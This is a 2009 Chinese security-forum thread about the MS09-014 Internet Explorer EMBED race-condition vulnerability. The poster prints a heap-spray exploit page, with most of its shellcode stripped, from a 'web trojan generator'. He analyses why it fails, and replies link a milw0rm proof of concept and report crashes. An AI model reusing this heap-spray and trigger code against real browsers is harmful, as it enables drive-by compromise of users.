首页
社区
课程
招聘
[讨论]ms09-014
发表于: 2009-6-8 17:12 4584

[讨论]ms09-014

2009-6-8 17:12
4584
这几天ms09-014ie漏洞很热,所以本人也从网上下载一些相关文件来学习一下。

看到网上有一个银狐IE 0DAY网马生成器(Ms09-014)v1.0,随即下载它,想要测试一把。

使用生成器生成htm文件后,测试结果显示不成功。首先显示的是htm文件中的JavaScript语法错误。

在第十七行由于asMimeTypes不是数组,因此asMimeTypes.shift()调用失败。

那既然调用失败,那还溢出个什么。那这个什么网马生成器就是骗人的,只是用来宣传自己网站的。

还是小弟实在是技术浅薄,识别不出大师的精要。请大家讨论下。

下面是生成的htm文件中的内容,shellcode已经大部分删除,只剩开头的%u9090%u9090%ucccc%ue1d9

<BODY onload=go()></BODY>
<SCRIPT>

var asMimeTypes=unescape("%u9090%u9090%ucccc%ue1d9");

var svfox = unescape("%u9090%u9090");

while(svfox.length < 0x40000) { svfox += svfox; }

memory = new Array();

for(i = 0; i < 200; i++)
   memory[i] = svfox + asMimeTypes;

function go() {

document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='"  + asMimeTypes.shift() + "'></embed>";
setTimeout(go, 1);
}
</SCRIPT>

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 296
活跃值: (89)
能力值: ( LV15,RANK:340 )
在线值:
发帖
回帖
粉丝
2
给个 milw0rm 公布的测试代码,asMimeTypes.shift() 这个执行到没什么问题,不过我IE6/IE7下测试都没看出什么毛病
MS09-014: MSIE EMBED element race condition memory corruption

在线测试地址http://www.milw0rm.com/exploit.php?id=8479
(注意关掉弹出窗口过滤)
2009-6-8 20:36
0
雪    币: 1450
活跃值: (35)
能力值: (RANK:680 )
在线值:
发帖
回帖
粉丝
3
"关掉弹出窗口过滤"这一条就极大地减小了攻击性~~

测试了下, 把我的搜狗浏览器搞挂了~ 其他没啥反映~
2009-6-8 21:14
0
雪    币: 220
活跃值: (721)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
那个什么银狐的,就是个骗子,他的东西看都不用看了
2009-6-8 21:30
0
雪    币: 259
活跃值: (60)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
5
二楼的朋友:

milw0rm 公布的测试代码和我从银狐生成器生成的代码是不一样的,你没有看到吗, milw0rm 的asMimeTypes明显被声明为一个数组,在数组上调用asMimeTypes.shift()当然没有什么问题,但是我得到的样本中unescape声明的字串就有问题。

三楼的朋友:

我不知道你用的是什么代码测试的,或许也是milw0rm的。

四楼的朋友:

我心里和你想的是一样的,只是感觉自己技术不够好,不敢确认而已。
2009-6-9 09:54
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
rsa
6
打了KB963027补丁之后  我的ie还会异常。
2009-6-30 11:13
0
游客
登录 | 注册 方可回帖
返回
//